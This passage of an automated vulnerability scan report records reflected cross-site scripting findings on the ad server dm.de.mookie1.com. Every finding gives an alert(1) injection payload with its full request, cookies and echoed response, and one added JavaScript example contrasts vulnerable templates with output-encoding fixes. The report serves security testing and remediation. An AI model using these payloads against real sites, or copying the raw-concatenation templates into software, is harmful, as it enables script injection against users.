4.299. http://dm.de.mookie1.com/2/B3DM/2010DM/11419206302@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11419206302@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27e8c"><script>alert(1)</script>e444b89420b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM27e8c"><script>alert(1)</script>e444b89420b/2010DM/11419206302@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296260551

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2645525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM27e8c"><script>alert(1)</script>e444b89420b/2010DM/1794573464/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.300. http://dm.de.mookie1.com/2/B3DM/2010DM/11419206302@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11419206302@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb7c0"><script>alert(1)</script>ffd68c8554e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMfb7c0"><script>alert(1)</script>ffd68c8554e/11419206302@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296260551

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMfb7c0"><script>alert(1)</script>ffd68c8554e/1496435852/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.301. http://dm.de.mookie1.com/2/B3DM/2010DM/11419206302@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11419206302@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65e59"><script>alert(1)</script>421d71bc1c5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11419206302@x2365e59"><script>alert(1)</script>421d71bc1c5?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296260551

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:21 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/538045584/x2365e59"><script>alert(1)</script>421d71bc1c5/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.302. http://dm.de.mookie1.com/2/B3DM/2010DM/11419206302@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11419206302@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2c42"-alert(1)-"8439d2acd81 was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/11419206302@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300c2c42"-alert(1)-"8439d2acd81 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296260551

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2483
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_300c2c42"-alert(1)-"8439d2acd81";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to ch
...[SNIP]...

4.303. http://dm.de.mookie1.com/2/B3DM/2010DM/11419206302@x23 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11419206302@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e9d3"-alert(1)-"c26e4d9cfe5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/11419206302@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300&5e9d3"-alert(1)-"c26e4d9cfe5=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296260551

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2486
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_300&5e9d3"-alert(1)-"c26e4d9cfe5=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...

4.304. http://dm.de.mookie1.com/2/B3DM/2010DM/11452529046@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11452529046@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70ff5"><script>alert(1)</script>d6553860e48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM70ff5"><script>alert(1)</script>d6553860e48/2010DM/11452529046@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; session=1296256112|1296264723

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM70ff5"><script>alert(1)</script>d6553860e48/2010DM/396567383/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

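The two reflection contexts in these dm.de.mookie1.com findings are a double-quoted JavaScript string (`var camp="..."` in 4.303, with the same pattern repeated for the campaign parameter on each path below) and a double-quoted HTML attribute (the `<A HREF="...">` click tag in 4.304 and the other REST URL parameter findings). The following is an added example, not code from the ad server or from the crawler: it rebuilds each template the vulnerable way, as the responses above show, then with output encoding chosen for that context, and applies the same oracle the scanner uses, whether the submitted payload comes back unmodified. The payloads and campaign name are copied from the report; the template strings and `CLICK_PREFIX` are reconstructed from the snipped responses and are an assumption about the server-side code.

```javascript
// Added example, not the ad server's code: the two reflection contexts from the
// findings, rendered vulnerably (raw concatenation, as the responses show) and
// with context-specific encoding, plus the reflection oracle a scanner applies.

// Payloads and campaign name copied from the report.
const CAMPAIGN = 'USNetwork/RS_SELL_2011Q1_AOL_CPA_300';
const JS_PAYLOAD = '1e274"-alert(1)-"0556165f4c0';
const ATTR_PAYLOAD = '70ff5"><script>alert(1)</script>d6553860e48';

// Assumed server-side templates, reconstructed from the snipped responses.
const CLICK_PREFIX = 'http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/';

function renderCampaignScriptVulnerable(campaign) {
  return '<script>var camp="' + campaign + '";</script>';
}

function renderClickTagVulnerable(segment) {
  return '<A HREF="' + CLICK_PREFIX + segment + '/x23/default/empty.gif?x" target="_top">';
}

// JavaScript string-literal context: hex-escape everything outside a narrow
// allow-list. Escaping '<' also removes "</script>", which the HTML parser
// honours even inside a string literal (JSON.stringify would leave it intact).
function encodeForJsString(s) {
  return String(s).replace(/[^A-Za-z0-9_.\/@-]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// HTML attribute context: character-reference-encode everything outside the
// allow-list, so '"' cannot close the attribute and '<' cannot open a tag.
function encodeForHtmlAttribute(s) {
  return String(s).replace(/[^A-Za-z0-9_.\/@-]/g,
    (ch) => '&#x' + ch.charCodeAt(0).toString(16) + ';');
}

function renderCampaignScriptSafe(campaign) {
  return '<script>var camp="' + encodeForJsString(campaign) + '";</script>';
}

function renderClickTagSafe(segment) {
  return '<A HREF="' + CLICK_PREFIX + encodeForHtmlAttribute(segment) + '/x23/default/empty.gif?x" target="_top">';
}

// The scanner's oracle: a finding is raised when the payload is echoed byte-for-byte.
function reflectedUnmodified(body, payload) {
  return body.includes(payload);
}

// Evaluate the encoded literal as a browser would, to confirm the value round-trips
// (the page's own camp.indexOf("AOL") logic keeps working on legitimate names).
function decodeJsStringLiteral(encoded) {
  return new Function('return "' + encoded + '";')();
}

console.log(renderCampaignScriptVulnerable(CAMPAIGN + JS_PAYLOAD));
console.log(renderCampaignScriptSafe(CAMPAIGN + JS_PAYLOAD));
console.log(renderClickTagVulnerable('B3DM' + ATTR_PAYLOAD));
console.log(renderClickTagSafe('B3DM' + ATTR_PAYLOAD));
```

Run with `node`. The `encodeForJsString` allow-list is deliberately narrow: `JSON.stringify` would escape the quote but leave `</script>` intact, and the HTML parser ends the script block at `</script>` regardless of JavaScript string state, so `<` has to be escaped as well. The attribute encoder turns `"` and `>` into character references; the browser still sees the original characters in the `href` after entity decoding, but they can no longer close the attribute or the tag. The report's own advice still applies: the better fix is not to place the campaign name in a script block at all.
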
4.305. http://dm.de.mookie1.com/2/B3DM/2010DM/11452529046@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11452529046@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94e82"><script>alert(1)</script>7a3c9d94146 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM94e82"><script>alert(1)</script>7a3c9d94146/11452529046@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; session=1296256112|1296264723

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:55 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM94e82"><script>alert(1)</script>7a3c9d94146/639000892/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.306. http://dm.de.mookie1.com/2/B3DM/2010DM/11452529046@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11452529046@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26307"><script>alert(1)</script>cf2e854f33a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11452529046@x2326307"><script>alert(1)</script>cf2e854f33a?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; session=1296256112|1296264723

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:02:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1492542860/x2326307"><script>alert(1)</script>cf2e854f33a/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.307. http://dm.de.mookie1.com/2/B3DM/2010DM/11452529046@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11452529046@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e274"-alert(1)-"0556165f4c0 was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/11452529046@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_3001e274"-alert(1)-"0556165f4c0 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; session=1296256112|1296264723

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2483
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_3001e274"-alert(1)-"0556165f4c0";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to ch
...[SNIP]...

4.308. http://dm.de.mookie1.com/2/B3DM/2010DM/11452529046@x23 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11452529046@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2009a"-alert(1)-"48bddd10057 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/B3DM/2010DM/11452529046@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300&2009a"-alert(1)-"48bddd10057=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; session=1296256112|1296264723

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2486
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_300&2009a"-alert(1)-"48bddd10057=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
   if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

       // Set cookie with marker to
...[SNIP]...

